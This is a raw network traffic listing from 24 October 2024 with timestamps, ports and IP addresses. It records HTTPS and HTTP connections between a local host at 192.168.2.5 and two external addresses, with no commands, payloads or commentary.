Oct 24, 2024 13:40:10.176987886 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.176995039 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.177016973 CEST	443	49704	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:10.177062035 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:10.183309078 CEST	49704	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:16.203890085 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:16.209471941 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:16.209570885 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:16.217039108 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:16.222812891 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069334030 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069349051 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069360971 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069400072 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069411039 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069422007 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069432020 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069473028 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069483995 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069495916 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.069509029 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.069509029 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.069509029 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.069509029 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.069509029 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.069569111 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.074935913 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.074980021 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.075006962 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.075036049 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.200889111 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.200912952 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.200927019 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.200938940 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.200952053 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.200980902 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201071978 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201071978 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201225996 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201239109 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201248884 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201287031 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201320887 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201639891 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201653957 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201664925 CEST	80	49705	162.55.60.2	192.168.2.5
Oct 24, 2024 13:40:17.201694965 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:17.201728106 CEST	49705	80	192.168.2.5	162.55.60.2
Oct 24, 2024 13:40:23.776995897 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:23.777010918 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:23.777079105 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:23.786514997 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:23.786529064 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:24.714190960 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:24.714281082 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:24.716536999 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:24.716542959 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:24.716958046 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:24.759447098 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:24.776010036 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:24.819333076 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.057240009 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.103183031 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.103197098 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.150075912 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.213466883 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213509083 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213525057 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213536978 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.213589907 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.213592052 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213612080 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213639975 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.213644028 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.213664055 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.259424925 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.362359047 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362370968 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362389088 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362401962 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362411022 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362430096 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362438917 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.362500906 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.362517118 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.362560987 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.363542080 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.363553047 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.363575935 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.363610029 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.363620043 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.363639116 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.363672018 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.515403986 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.515460968 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.515491009 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.515521049 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.515539885 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.515568972 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.667270899 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.667331934 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.667458057 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.667458057 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.667490959 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.667532921 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.668858051 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.668912888 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.668936968 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.668946981 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.668972015 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.668998003 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.820040941 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.820079088 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.820216894 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.820216894 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.820235968 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.820338964 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.820950985 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.820976973 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.821059942 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.821059942 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.821069002 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.822705984 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.972106934 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.972136974 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.972275019 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.972306967 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.972429037 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.973376989 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.973404884 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.973481894 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.973481894 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.973491907 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.973615885 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.973938942 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.973958015 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.974086046 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:25.974093914 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:25.974153042 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.125197887 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.125222921 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.125334024 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.125334024 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.125350952 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.126075029 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.126099110 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.126168966 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.126169920 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.126182079 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.126775026 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.276900053 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.276926994 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.277009964 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.277089119 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.277134895 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.277383089 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.277610064 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.277647018 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.277702093 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.277715921 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.277750015 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.278105021 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.278126955 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.278167009 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.278182030 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.278233051 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.278328896 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.278902054 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.278920889 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.279094934 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.279113054 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.279246092 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430231094 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.430258036 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.430370092 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430370092 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430392981 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.430491924 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430707932 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.430727959 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.430808067 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430808067 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.430818081 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.431035042 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.431428909 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.431451082 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.431540966 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.431540966 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.431550026 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.431641102 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.582240105 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582303047 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582433939 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.582433939 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.582475901 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582746983 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582792997 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.582796097 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582832098 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.582848072 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.582978010 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.583384037 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.583425045 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.583446026 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.583471060 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.583504915 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.583504915 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.584017038 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.584062099 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.584064960 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.584088087 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.584108114 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.584131956 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.587030888 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736071110 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736103058 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736224890 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736224890 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736232042 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736254930 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736279011 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736318111 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736336946 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736371994 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736475945 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736495018 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736540079 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736567974 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736608028 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736716032 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736818075 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736841917 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736877918 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.736891031 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.736928940 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.737119913 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.737142086 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.737157106 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.737170935 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.737200022 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.737242937 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.737242937 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.887259007 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887341976 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887433052 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.887468100 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887495995 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.887516022 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.887738943 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887784958 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887833118 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.887851000 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.887885094 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888158083 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888211012 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888225079 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888245106 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888278008 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888305902 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888735056 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888777018 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888798952 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888812065 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:26.888839006 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:26.888859987 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039283991 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039361954 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039408922 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039437056 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039470911 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039493084 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039720058 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039760113 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039797068 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039809942 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.039849043 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.039849043 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040250063 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040291071 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040328026 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040339947 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040374994 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040394068 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040527105 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040569067 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040591002 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040604115 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.040633917 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.040663958 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.041084051 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.041121960 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.041157007 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.041168928 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.041196108 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.041213989 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192055941 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192079067 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192161083 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192230940 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192266941 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192334890 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192369938 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192401886 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192440033 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192452908 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192481041 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192502022 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192838907 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192861080 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192924023 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192935944 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.192962885 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.192987919 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.193291903 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193310976 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193373919 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.193388939 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193718910 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193742990 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193790913 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.193811893 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.193835974 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.193892956 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.194108009 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.194127083 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.194186926 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.194200993 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.194293022 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.344969034 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.344994068 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345081091 CEST	49717	443	192.168.2.5	188.132.193.46
Oct 24, 2024 13:40:27.345114946 CEST	443	49717	188.132.193.46	192.168.2.5
Oct 24, 2024 13:40:27.345376968 CEST	49717	443	192.168.2.5	188.132.193.46
